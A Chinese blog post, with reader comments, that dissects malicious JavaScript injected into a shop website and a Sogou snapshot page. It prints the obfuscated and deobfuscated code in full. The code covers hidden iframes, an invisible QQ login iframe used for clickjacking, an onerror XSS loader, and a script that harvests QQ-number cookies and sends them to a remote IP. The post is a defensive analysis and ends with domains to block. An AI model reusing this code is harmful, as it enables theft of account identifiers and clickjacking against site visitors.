mb5u_oHead=document[_0xc112[2]](_0xc112[1])[_0xc112[0]](0);var mb5ux=0;var mb5uy=0;var mb5u_iframe_hover=false;var i_referrer=encodeURIComponent(document[_0xc112[3]]);var i_url=encodeURIComponent(document[_0xc112[5]][_0xc112[4]]);var i_title=encodeURIComponent(document[_0xc112[6]]);function Creatif5u(b,c){var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=b;if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[13]][_0xc112[12]]=_0xc112[14];a[_0xc112[15]]=_0xc112[16];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);mb5u_oHead[_0xc112[20]](a)}function Creatjs5u(b,c){var a=document[_0xc112[8]](_0xc112[21]);a[_0xc112[22]]=_0xc112[23];if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[24]]=_0xc112[25];a[_0xc112[9]]=b;mb5u_oHead[_0xc112[20]](a)}function Creatif5ubody(b,c){var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=b;if(c!=_0xc112[10]&&c!=null){a[_0xc112[11]]=c};a[_0xc112[13]][_0xc112[12]]=_0xc112[14];a[_0xc112[15]]=_0xc112[16];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);document[_0xc112[2]](_0xc112[26])[_0xc112[0]](0)[_0xc112[20]](a)}function Gc5u(a){var b,reg=new RegExp(_0xc112[27]+a+_0xc112[28]);if(b=document[_0xc112[30]][_0xc112[29]](reg)){return unescape(b[2])}else{return null}}function Sc5u(a,b){var c=new Date();c[_0xc112[32]](c[_0xc112[31]]()+2*24*60*60*1000);document[_0xc112[30]]=a+_0xc112[33]+escape(b)+_0xc112[34]+c[_0xc112[35]]()}function Q5u(){var a=i_php+_0xc112[36]+i_uid+_0xc112[37]+i_qz+_0xc112[38]+i_time+_0xc112[39]+i_referrer+_0xc112[40]+i_url+_0xc112[41]+i_title+_0xc112[42]+(new Date())[_0xc112[31]]();Creatjs5u(a,_0xc112[43])}function Umb5u(){var a=i_php+_0xc112[44]+i_uid+_0xc112[45]+i_referrer+_0xc112[46]+i_url+_0xc112[41]+i_title+_0xc112[47]+i_fkid+_0xc112[48]+(new Date())[_0xc112[31]]();Creatif5u(a)}function mb5u_noLogin(){var a=i_php+_0xc112[49]+i_fkid+_0xc112[50]+(new Date)[_0xc112[31]]();Creatjs5u(a);setTimeout(ck5u,500)}function ck5u(){if(wdl==_0xc112[51]){if(!navigator[_0xc112[52]][_0xc112[29]](/(iPhone|iPod|Android|ios)/i)){if(Gc5u(_0xc112[53])==null){ptU5u()}}}}function ptU5u(){window[_0xc112[54]]=_0xc112[55];var a=document[_0xc112[8]](_0xc112[7]);a[_0xc112[9]]=_0xc112[56];a[_0xc112[11]]=_0xc112[54];a[_0xc112[13]][_0xc112[12]]=_0xc112[57];a[_0xc112[15]]=_0xc112[16];a[_0xc112[58]]=_0xc112[59];a[_0xc112[19]](_0xc112[17],_0xc112[18],0);var b=document[_0xc112[61]][_0xc112[60]];document[_0xc112[61]][_0xc112[62]](a,b)}function mb5u_GetCurrentStyle(a,b){if(a[_0xc112[63]]){return a[_0xc112[63]][b]}else{if(window[_0xc112[64]]){propprop=b[_0xc112[66]](/([A-Z])/g,_0xc112[65]);propprop=b[_0xc112[67]]();return document[_0xc112[68]][_0xc112[64]](a,null)[propprop]}};return null}window[_0xc112[69]]=function(){var h=document[_0xc112[70]](_0xc112[54]);mb5u_iframeClick(h,mb5uiframeclickcallback);document[_0xc112[71]]=function(a){mb5u_iframe_hover=false;window[_0xc112[72]]();var b=document[_0xc112[70]](_0xc112[54]);var a=a||window[_0xc112[73]];mb5ux=a[_0xc112[74]];mb5ux=a[_0xc112[75]];var c=document[_0xc112[61]][_0xc112[76]]+document[_0xc112[77]][_0xc112[76]];var d=document[_0xc112[77]][_0xc112[78]]-a[_0xc112[74]];var e=document[_0xc112[61]][_0xc112[79]]+document[_0xc112[77]][_0xc112[79]];var f=0;var g=mb5u_GetCurrentStyle(document[_0xc112[61]],_0xc112[80]);if(document[_0xc112[77]][_0xc112[81]]>document[_0xc112[61]][_0xc112[81]]&&g==_0xc112[82]){f=(document[_0xc112[77]][_0xc112[81]]-document[_0xc112[61]][_0xc112[81]])/2;f=f+e;b[_0xc112[13]][_0xc112[83]]=(c+a[_0xc112[75]]-25)+_0xc112[84];b[_0xc112[13]][_0xc112[85]]=((d<b[_0xc112[78]]?a[_0xc112[74]]-b[_0xc112[78]]:a[_0xc112[74]])-f)+_0xc112[84]}else{f=f+e;b[_0xc112[13]][_0xc112[83]]=(c+a[_0xc112[75]]-25)+_0xc112[84];b[_0xc112[13]][_0xc112[85]]=((d<b[_0xc112[78]]?a[_0xc112[74]]-b[_0xc112[78]]:a[_0xc112[74]])+f)+_0xc112[84]}}};function mb5u_iframeClick(a,b){a[_0xc112[86]]=function(){mb5u_iframe_hover=true};a[_0xc112[87]]=function(){mb5u_iframe_hover=false};window[_0xc112[88]]=function(){if(mb5u_iframe_hover){b()}}}function mb5uiframeclickcallback(){var b=document[_0xc112[70]](_0xc112[54]);setTimeout(function(){try{b[_0xc112[13]][_0xc112[89]]=_0xc112[90];var a=document[_0xc112[91]](mb5ux,mb5uy);a[_0xc112[92]]()}catch(e){b[_0xc112[13]][_0xc112[89]]=_0xc112[90]};Umb5u();Sc5u(_0xc112[53],_0xc112[93])},1000)}function qqchat5u(i){if(i==1){var a=_0xc112[94]+i_qq+_0xc112[95]+i_d+_0xc112[96];Creatif5ubody(a,_0xc112[97])}else{Creatjs5u(_0xc112[98]+i_qq+_0xc112[99],_0xc112[100])}}function JSONP_CALLBACK_5u(a){var b=a[_0xc112[102]][_0xc112[101]];Creatjs5u(_0xc112[103]+i_qq+_0xc112[104]+b+_0xc112[105]+i_url+_0xc112[41]+i_title+_0xc112[106],_0xc112[100])}function bizqqkey5u(a){var b=a[_0xc112[102]][_0xc112[109]][_0xc112[66]](_0xc112[107],_0xc112[108]);b=b[_0xc112[66]](_0xc112[110],_0xc112[110]);Creatif5ubody(b,_0xc112[111])}if(document[_0xc112[113]][_0xc112[112]](i_d)>=0){Umb5u();setTimeout(mb5u_noLogin,1500);if(i_h==_0xc112[93]){setTimeout(_0xc112[114],i_yc)};if(i_h==_0xc112[115]){setTimeout(_0xc112[116],i_yc)}};
为了保留原意,所以全部贴出来了。可是这一步得到的还是混淆过的,我们要继续反混淆。其实反混淆这事儿挺苦逼的,因为需要自己写脚本。话说这个混淆的方式怎么这么眼熟呢,OpenGG同学以前也这么干过。
最终反混淆的代码如下,都已经格式化了。
var puid = '5867'; var pap = 'http://182.92.239.23/g.php?surl='; var pr = encodeURIComponent(document.referrer); var pu = encodeURIComponent(document.location.href); var pt = encodeURIComponent(document.title); var phead = document.getElementsByTagName('HEAD').item(0); var cslist = 'uid=' + puid + '&r=' + pr + '&u=' + pu + '&t=' + pt; var purl = encodeURIComponent('http://42.120.11.238:8888/?action=p&' + cslist + '&f=jfif&p='); function Cimg(src) { var a = document.createElement('img'); a.src = src; a.style = 'display:none'; }; function Cifr(src) { var ifr = document.createElement('iframe'); ifr.src = src; ifr.width = ifr.height = ifr.frameBorder = 0; ifr.scrolling = 'no'; ifr.allowTransparency = 'true'; ifr.style.display = 'none'; phead.appendChild(ifr); }; Cifr(pap + purl); var i_php = 'http://42.120.11.238:8888/'; var i_uid = '5867'; var i_h = '0'; var i_qq = '0'; var i_d = 'www.zxdl369.cn'; var i_yc = 2000; var i_fkid = '1416369920'; var mb5u_oHead = document['getElementsByTagName']('HEAD') ['item'](0); var mb5ux = 0; var mb5uy = 0; var mb5u_iframe_hover = false; var i_referrer = encodeURIComponent(document['referrer']); var i_url = encodeURIComponent(document['location']['href']); var i_title = encodeURIComponent(document['title']); function Creatif5u(b, c) { var a = document['createElement']('iframe'); a['src'] = b; if (c != '' && c != null) { a['id'] = c }; a['style']['cssText'] = 'width:0px;height:0px;display:none;'; a['scrolling'] = 'no'; a['setAttribute']('frameborder', '0', 0); mb5u_oHead['appendChild'](a) } function Creatjs5u(b, c) { var a = document['createElement']('script'); a['type'] = 'text/javascript'; if (c != '' && c != null) { a['id'] = c }; a['charset'] = 'utf-8'; a['src'] = b; mb5u_oHead['appendChild'](a) } function Creatif5ubody(b, c) { var a = document['createElement']('iframe'); a['src'] = b; if (c != '' && c != null) { a['id'] = c }; a['style']['cssText'] = 'width:0px;height:0px;display:none;'; a['scrolling'] = 'no'; a['setAttribute']('frameborder', '0', 0); document['getElementsByTagName']('BODY') ['item'](0) ['appendChild'](a) } function Gc5u(a) { var b, reg = new RegExp('(^| )' + a + '=([^;]*)(;|$)'); if (b = document['cookie']['match'](reg)) { return unescape(b[2]) } else { return null } } function Sc5u(a, b) { var c = new Date(); c['setTime'](c['getTime']() + 2 * 24 * 60 * 60 * 1000); document['cookie'] = a + '=' + escape(b) + ';expires=' + c['toGMTString']() } function Q5u() { var a = i_php + '?action=saveQQ&uid=' + i_uid + '&qz=' + i_qz + '&time=' + i_time + '&referrer=' + i_referrer + '&url=' + i_url + '&title=' + i_title + '&r=' + (new Date()) ['getTime'](); Creatjs5u(a, 'smevn5du') } function Umb5u() { var a = i_php + '/sx.php?uid=' + i_uid + '&ref=' + i_referrer + '&furl=' + i_url + '&title=' + i_title + '&fkid=' + i_fkid + '&tm=' + (new Date()) ['getTime'](); Creatif5u(a) } function mb5u_noLogin() { var a = i_php + '/m/wdl.php?c=' + i_fkid + '&r=1&time=' + (new Date) ['getTime'](); Creatjs5u(a); setTimeout(ck5u, 500) } function ck5u() { if (wdl == 'Y') { if (!navigator['userAgent']['match'](/(iPhone|iPod|Android|ios)/i)) { if (Gc5u('ifptu5u') == null) { ptU5u() } } } } function ptU5u() { window['mb5uptlogin'] = '<iframe style="position:absolute;width:580px;height:366px; margin:-150px 0 0 -340px;filter:alpha(opacity=00);-moz-opacity:0.0;-khtml-opacity: 0.0;opacity: 0.0;" scrolling="no" name="mb5u" id="mb5uptlogin" src="http://ui.ptlogin2.qq.com/cgi-bin/login?link_target=blank&target=blank&appid=6000201&daid=220&hide_uin_tip=1&style=11&hide_close_icon=1&target=self&qtarget=0&hide_title_bar=1&s_url=http%3A%2F%2Fapp.data.qq.com%2Fcate%2FpopLogin" frameborder="0" onload="setTimeout(top.mb5u_ifmove,0);">'; var a = document['createElement']('iframe'); a['src'] = 'javascript:parent.mb5uptlogin'; a['id'] = 'mb5uptlogin'; a['style']['cssText'] = 'position:absolute; z-index: 2147483647;width:50px; height:50px; '; a['scrolling'] = 'no'; a['onerror'] = 'return true;'; a['setAttribute']('frameborder', '0', 0); var b = document['body']['firstChild']; document['body']['insertBefore'](a, b) } function mb5u_GetCurrentStyle(a, b) { if (a['currentStyle']) { return a['currentStyle'][b] } else { if (window['getComputedStyle']) { propprop = b['replace'](/([A-Z])/g, '-$1'); propprop = b['toLowerCase'](); return document['defaultView']['getComputedStyle'](a, null) [propprop] } }; return null } window['mb5u_ifmove'] = function () { var h = document['getElementById']('mb5uptlogin'); mb5u_iframeClick(h, mb5uiframeclickcallback); document['onmousemove'] = function (a) { mb5u_iframe_hover = false; window['focus'](); var b = document['getElementById']('mb5uptlogin'); var a = a || window['event']; mb5ux = a['clientX']; mb5ux = a['clientY']; var c = document['body']['scrollTop'] + document['documentElement']['scrollTop']; var d = document['documentElement']['offsetWidth'] - a['clientX']; var e = document['body']['scrollLeft'] + document['documentElement']['scrollLeft']; var f = 0; var g = mb5u_GetCurrentStyle(document['body'], 'position'); if (document['documentElement']['clientWidth'] > document['body']['clientWidth'] && g == 'relative') { f = (document['documentElement']['clientWidth'] - document['body']['clientWidth']) / 2; f = f + e; b['style']['top'] = (c + a['clientY'] - 25) + 'px'; b['style']['left'] = ((d < b['offsetWidth'] ? a['clientX'] - b['offsetWidth'] : a['clientX']) - f) + 'px' } else { f = f + e; b['style']['top'] = (c + a['clientY'] - 25) + 'px'; b['style']['left'] = ((d < b['offsetWidth'] ? a['clientX'] - b['offsetWidth'] : a['clientX']) + f) + 'px' } } }; function mb5u_iframeClick(a, b) { a['onmouseover'] = function () { mb5u_iframe_hover = true }; a['onmouseout'] = function () { mb5u_iframe_hover = false }; window['onblur'] = function () { if (mb5u_iframe_hover) { b() } } } function mb5uiframeclickcallback() { var b = document['getElementById']('mb5uptlogin'); setTimeout(function () { try { b['style']['display'] = 'none'; var a = document['elementFromPoint'](mb5ux, mb5uy); a['click']() } catch (e) { b['style']['display'] = 'none' }; Umb5u(); Sc5u('ifptu5u', '1') }, 1000) } function qqchat5u(i) { if (i == 1) { var a = 'tencent://message/?uin=' + i_qq + '&Site=' + i_d + '&Menu=yes'; Creatif5ubody(a, 'qqchat5u1') } else { Creatjs5u('http://wpl.b.qq.com/cgi/conv.php?num=' + i_qq + '&cb=JSONP_CALLBACK_5u', 'bizqqkey') } } function JSONP_CALLBACK_5u(a) { var b = a['data']['kfuin']; Creatjs5u('http://wpd.b.qq.com/cgi/get_sign.php?na=' + i_qq + '&kfuin=' + b + '&aty=0&a=0&sid=&uid=&url=' + i_url + '&title=' + i_title + '&dm=&clkSrc=&ext=&cb=bizqqkey5u', 'bizqqkey') } function bizqqkey5u(a) { var b = a['data']['sign']['replace']('&', '&'); b = b['replace']('/', '/'); Creatif5ubody(b, 'qqchat5u2') } if (document['domain']['indexOf'](i_d) >= 0) { Umb5u(); setTimeout(mb5u_noLogin, 1500); if (i_h == '1') { setTimeout('qqchat5u(1)', i_yc) }; if (i_h == '2') { setTimeout('qqchat5u()', i_yc) } };
这个代码有点长,但我们其实不用关心那么多。在这其中,我们看到大量的隐藏iframe操作,可见插入了不少iframe。插到哪里去了?喏。
在这JS中我们甚至能看到直接调用企鹅的登录浮窗的界面……禁不住要问一下,这货到底是要干嘛啊?
不过我们并没有看到企鹅的登录浮窗(因为我曾经在浏览器中登录的关系?没登录是不是就会自动弹了?只是猜测,没有做深入研究,这不是重点)。
从上面一段脚本的最后我们看到了Umb5u()
和mb5u_noLogin
两个函数调用,看了看觉得前面一个比较重要,因为它嵌入了一个带有资源返回的iframe:http://42.120.11.238:8888//sx.php?uid=5867&ref=&furl=http%3A%2F%2Fwww.zxdl369.cn%2Fonlineshop%2Ffojiaoyongpin%2Ftongzhutai%2F&title=%E4%BA%A7%E5%93%81%E5%B1%95%E5%8E%85%E2%80%94%E6%89%8E%E8%A5%BF%E5%BE%B7%E5%8B%92&fkid=1416369920&tm=1431411413183
PS,sx.php原意是傻Ⅹ.拍黄片儿的意思吗?
看!混入了奇怪的东西耶!有狗出没!!
3.猪一样的搜狗
嗯,可惜搜狗和腾讯的关系很紧密,所以你看我都没登录过搜狗,却依然在搜狗下面留下了Cookies信息,腾讯擅长把会话密钥啊QQ号啊之类的东西写在Cookies里,所以很多人喜欢XSS这些信息。这不,其实是搜狗搞的。
上面访问的网址是搜狗的网页快照服务,看到这个我就闻到了XSS的味道……
看看这个页面的源码吧,直接拉到最下面。
看到那个img标签没?嗯。这里构造了一个不存在的img地址,然后使用onerror来触发它。
onerror的内容如下。
/*_Ka*/var/*hCnn*/IHse/*Wav*/=/*fBJAp*/\u0053\u0074\u0072\u0069\u006e\u0067./*lsxIcC*/\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065;/*ksHMx*/var/*KuVkYP*/NWVbw_QY/*_ztkzYy*/=/*_pNZE*/\u0065\u0076\u0061\u006c;NWVbw_QY(IHse(118,97,114,32,111,72,101,97,100,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,72,69,65,68,39,41,46,105,116,101,109,40,48,41,59,118,97,114,32,111,83,99,114,105,112,116,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,111,83,99,114,105,112,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,59,111,83,99,114,105,112,116,46,115,114,99,61,34,104,116,116,112,58,47,47,113,113,46,109,98,53,117,46,99,111,109,47,113,113,46,106,115,34,59,111,72,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,111,83,99,114,105,112,116,41,59));"
好嘛,又混淆了,别以为我不知道你想干坏事。真相是啥呢?
var oHead=document.getElementsByTagName('HEAD').item(0);var oScript= document.createElement("script");oScript.type="text/javascript";oScript.src="http://qq.mb5u.com/qq.js";oHead.appendChild(oScript);
原来是又嵌入了一个脚本引用。这个qq.js内容是啥呢?
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c–)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l 4(a){3 b,T=Y 1y("(^| )"+a+"=([^;]*)(;|$)");h(b=9.12.13(T))n 1q(b[2]);D n A}l 6(a){3 b=9.14.15;3 c=b.1k(b.C("?")+1).1w("&");j(3 i=0;i<c.p;i++){3 d=c[i].C(a+"=");h(d!=-1){n c[i].z(a+"=","").z("?","");17}}n""}l Q(a){3 b=6(\'R\');3 c=6(\'1u\');3 d=6(\'1v\');3 e=6(\'S\');3 f="U://V.X.11.Z:10/?1a=1c";f+="&1e="+a;f+="&R="+b;f+="&1g="+c;f+="&1i="+d;f+="&S="+e;f+="&r="+(Y 1m()).1o();3 g=9.E("F");g.G="H/I";g.J=f;9.K(\'L\').M(0).N(g)}l O(b){3 a=9.E("F");a.G="H/I";a.18="19-8″;a.J=b;9.K(\'L\').M(0).N(a)}3 s=4("1b");3 x=4("1d");3 t=4("1f");3 u=4("1h");3 v=4("1j");3 w=4("1l");3 q=4("1n");3 y=4("1p");3 W=s||x||t||u||v||w||q||y;h(W==A){O("U://V.X.11.Z:10/m/1r.1s?c="+6(\'1t\')+"&d=1″)}D{3 k=[s,x,t,u,v,w,q,y];3 5=[];3 7=[];3 B={};j(3 i=0;i<k.p;i++){h(k[i]!=A){3 a=k[i].z(/^[o|0]*/1x,"");5.P(a)}}j(3 i=0;i<5.p;i++){h(!B[5[i]]){B[5[i]]=1z;h(1A(5[i])>1B){7.P(5[i])}}}7=7.16();j(3 i=0;i<7.p;i++){Q(7[i])}}',62,100,'|||var|Gc5u|buin|Re5u|cuin||document||||||||if||for|auin|function||return||length|u7||u1|u3|u4|u5|u6|u2|u8|replace|null|uq|indexOf|else|createElement|script|type|text|javascript|src|getElementsByTagName|HEAD|item|appendChild|Creatjs5u|push|Q5u|uid|title|reg|http|42|quin|120|new|238|8888||cookie|match|location|href|reverse|break|charset|utf|action|pt2gguin|saveQQ|o_cookie|qq|p_uin|referrer|uin|url|ptui_loginuin|substring|uin_cookie|Date|luin|getTime|qm_username|unescape|wdl|php|fkid|ref|furl|split|ig|RegExp|true|parseInt|10051′.split('|'),0,{}))
咳咳……你以为这样有用吗,图样图森破。
function Gc5u(a) { var b, reg = new RegExp('(^| )' + a + '=([^;]*)(;|$)'); if (b = document.cookie.match(reg)) return unescape(b[2]); else return null } function Re5u(a) { var b = document.location.href; var c = b.substring(b.indexOf('?') + 1).split('&'); for (var i = 0; i < c.length; i++) { var d = c[i].indexOf(a + '='); if (d != - 1) { return c[i].replace(a + '=', '').replace('?', ''); break } } return '' } function Q5u(a) { var b = Re5u('uid'); var c = Re5u('ref'); var d = Re5u('furl'); var e = Re5u('title'); var f = 'http://42.120.11.238:8888/?action=saveQQ'; f += '&qq=' + a; f += '&uid=' + b; f += '&referrer=' + c; f += '&url=' + d; f += '&title=' + e; f += '&r=' + (new Date()).getTime(); var g = document.createElement('script'); g.type = 'text/javascript'; g.src = f; document.getElementsByTagName('HEAD').item(0).appendChild(g) } function Creatjs5u(b) { var a = document.createElement('script'); a.type = 'text/javascript'; a.charset = 'utf-8'; a.src = b; document.getElementsByTagName('HEAD').item(0).appendChild(a) } var u1 = Gc5u('pt2gguin'); var u2 = Gc5u('o_cookie'); var u3 = Gc5u('p_uin'); var u4 = Gc5u('uin'); var u5 = Gc5u('ptui_loginuin'); var u6 = Gc5u('uin_cookie'); var u7 = Gc5u('luin'); var u8 = Gc5u('qm_username'); var quin = u1 || u2 || u3 || u4 || u5 || u6 || u7 || u8; if (quin == null) { Creatjs5u('http://42.120.11.238:8888/m/wdl.php?c=' + Re5u('fkid') + '&d=1') } else { var auin = [ u1, u2, u3, u4, u5, u6, u7, u8 ]; var buin = [ ]; var cuin = [ ]; var uq = { }; for (var i = 0; i < auin.length; i++) { if (auin[i] != null) { var a = auin[i].replace(/^[o|0]*/gi, ''); buin.push(a) } } for (var i = 0; i < buin.length; i++) { if (!uq[buin[i]]) { uq[buin[i]] = true; if (parseInt(buin[i]) > 10051) { cuin.push(buin[i]) } } } cuin = cuin.reverse(); for (var i = 0; i < cuin.length; i++) { Q5u(cuin[i]) } }
这段脚本很简单,枚举了各个可能的Cookies,如果找到了,就发回去。于是就看到了如下的这个请求。
奇怪,我都没打开过搜狗,为什么搜狗会有Cookies?那谁知道呢,企鹅和搜狗是那么好的基友,交叉感染司空见惯。
所以,我的QQ号就出去咯。
4.解决
搜狗的问题,当然要搜狗来解决咯。
在他们搞这个事儿之前,我先把那几个奇奇怪怪的域名全部ban掉再说。
- 42.120.11.238:8888
- qq.mb5u.com
Chrome/Firefox上可以使用Adblock Plus来阻断这些请求,IE上可以使用跟踪保护来阻断这些请求。
5.后记
我正准备把这个当漏洞提交到乌云的时候,搜索了下发现早在去年七月就已经有人提交了:http://www.wooyun.org/bugs/wooyun-2010-069640
然后搜狗的反应是:主!动!选!择!忽!略!!
天啊……看到这态度,我立马ban掉了搜狗的域名,不负责任的运营商分分钟给我滚粗!
这个你也行, 厉害
虽然没看懂,但是感觉很牛逼的样子
啊啊,一不小心就看到这个XSS了。之前也发现了这个,不过没鱼大分析的全面啊~
打开这个网站后,竟然不给我发广告邮件:-x
不知道是不是屏蔽了。
木鱼大人,谢谢你花费这么多时间为我们解惑,然后我一个也没看懂,只能默默飘过!
= =# 。。。飘过还这么用心
也许作者就是从被忽略的乌云中挖的矿啊~
不是的。。你仔细看看乌云漏洞报告里的例子,其实就是这个网站
会打dota的大神好牛逼8-) "咳咳"反混淆技能好强大,我也要搜搜学学
晚些时候我可以写一个小的博客来解释如何反混淆
灰常期待^ω^啊啊啊
最想要的是两次的反混淆.好高深的样子
这个。。晚些时候我可以写一个小的博客来解释如何反混淆
鱼大大就是好,好大大就是鱼
有一个技术牛逼的朋友真好
反正我没看懂。。。